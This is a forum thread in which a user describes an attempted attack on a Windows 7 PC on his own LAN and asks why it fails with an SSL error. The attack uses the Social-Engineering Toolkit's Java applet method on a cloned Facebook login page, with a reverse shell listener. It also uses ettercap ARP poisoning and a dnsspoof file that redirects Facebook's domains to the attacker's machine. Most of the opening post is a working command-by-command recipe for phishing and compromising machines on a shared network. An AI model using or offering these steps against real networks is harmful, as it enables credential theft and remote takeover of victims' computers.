Results 1 to 4 of 4

Thread: SSL error when trying to a Java applet social engineering attack on LAN PC.

  1. #1
    Join Date
    2013-Sep
    Posts
    14

    SSL error when trying to a Java applet social engineering attack on LAN PC.

    Hi all,
    I have an issue with set.
    What I try to do is to get into my Windows 7 PC.
    So what I did is this.
    My WLAn interface is wlan0 with IP 192.168.1.103
    I startup SET.

    1) Social-Engineering Attacks
    2) Website Attack Vectors
    1) Java Applet Attack Method
    2) Site Cloner

    Then I get the following question, " Are you using NAT/Port Forwarding [yes|no]: "
    My question is, Do I need port forwarding?
    So I choose no.

    Then I get this.
    Enter the IP address of your interface IP or if your using an external IP, *****
    So I enter 192.168.1.103 ( My Kali Machine )

    Then the following question from SET.
    set:webattack> Enter the url to clone:
    I choose facebook.com
    [*] Cloning the website: https://login.facebook.com/login.php[*] This could take a little bit...[*] Injecting Java Applet attack into the newly cloned website.[*] Filename obfuscation complete. Payload name is: 7wjLfbL5cbTAk0R[*] Malicious java applet website prepped for deployment

    So far so good.

    Then I choose option 12 in SET
    12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support

    Then I get
    setayloads> PORT of the listener [443]:443
    So I gave 443 as port.

    And set starts to listen.
    Starting encrypted web shell server, use <Ctrl-C> to stop

    In another terminal I start ettercap. So I start ettercap with the following command.
    ettercap -Tqi wlan0 -M arp // // -P autoadd

    Then in another terminal I created a file for facebook named facebook-dns. This is what is in that file.
    192.168.1.103 facebook.com
    192.168.1.103 *.facebook.com

    Then I start DNS spoof with the following command.
    dnsspoof -i wlan0 -f facebook-dns and hit enter.
    dnsspoof: listening on wlan0 [udp dst port 53 and not src 192.168.1.103]

    So far so good.

    Then I go to my Windows 7 machine and type in the browser.
    facebook.com

    BAM I would expect but the page doesn't load at all and says SSL error.
    So my SET doesn't get a shell and my windows PC cant even load facebook.

    Is there anything I've missed? Can anybody help me?

    Thanks in advance.

  2. #2
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Attilafx View Post
    Hi all,
    I have an issue with set.
    What I try to do is to get into my Windows 7 PC.
    So what I did is this.
    My WLAn interface is wlan0 with IP 192.168.1.103
    I startup SET.

    1) Social-Engineering Attacks
    2) Website Attack Vectors
    1) Java Applet Attack Method
    2) Site Cloner

    Then I get the following question, " Are you using NAT/Port Forwarding [yes|no]: "
    My question is, Do I need port forwarding?
    So I choose no.

    Then I get this.
    Enter the IP address of your interface IP or if your using an external IP, *****
    So I enter 192.168.1.103 ( My Kali Machine )

    Then the following question from SET.
    set:webattack> Enter the url to clone:
    I choose facebook.com
    [*] Cloning the website: https://login.facebook.com/login.php[*] This could take a little bit...[*] Injecting Java Applet attack into the newly cloned website.[*] Filename obfuscation complete. Payload name is: 7wjLfbL5cbTAk0R[*] Malicious java applet website prepped for deployment

    So far so good.

    Then I choose option 12 in SET
    12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support

    Then I get
    setayloads> PORT of the listener [443]:443
    So I gave 443 as port.

    And set starts to listen.
    Starting encrypted web shell server, use <Ctrl-C> to stop

    In another terminal I start ettercap. So I start ettercap with the following command.
    ettercap -Tqi wlan0 -M arp // // -P autoadd

    Then in another terminal I created a file for facebook named facebook-dns. This is what is in that file.
    192.168.1.103 facebook.com
    192.168.1.103 *.facebook.com

    Then I start DNS spoof with the following command.
    dnsspoof -i wlan0 -f facebook-dns and hit enter.
    dnsspoof: listening on wlan0 [udp dst port 53 and not src 192.168.1.103]

    So far so good.

    Then I go to my Windows 7 machine and type in the browser.
    facebook.com

    BAM I would expect but the page doesn't load at all and says SSL error.
    So my SET doesn't get a shell and my windows PC cant even load facebook.

    Is there anything I've missed? Can anybody help me?

    Thanks in advance.
    hi
    i'm not expert..but if this can help you:
    https://vimeo.com/79043898

  3. #3
    Join Date
    2013-Sep
    Posts
    14
    Thanks Zimmaro but didn't work neither. I get the following error.

    # ettercap -i wlan1 192.168.1.1

    ettercap NG-0.7.4.2 copyright 2001-2005 ALoR & NaGA


    Incorrect number of token (//) in TARGET !!

  4. #4
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Attilafx View Post
    Thanks Zimmaro but didn't work neither. I get the following error.

    # ettercap -i wlan1 192.168.1.1

    ettercap NG-0.7.4.2 copyright 2001-2005 ALoR & NaGA


    Incorrect number of token (//) in TARGET !!
    ....I do not think there is in the video .. that COMMAND
    use video-function "replay"or "MOVIOLA".........&& READ the"collauts"
    @luck

Similar Threads

  1. Replies: 0
    Last Post: 2014-05-08, 16:58
  2. Social Engineering Toolkit Error
    By DrDinosaur in forum TroubleShooting Archive
    Replies: 7
    Last Post: 2013-05-08, 00:27

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •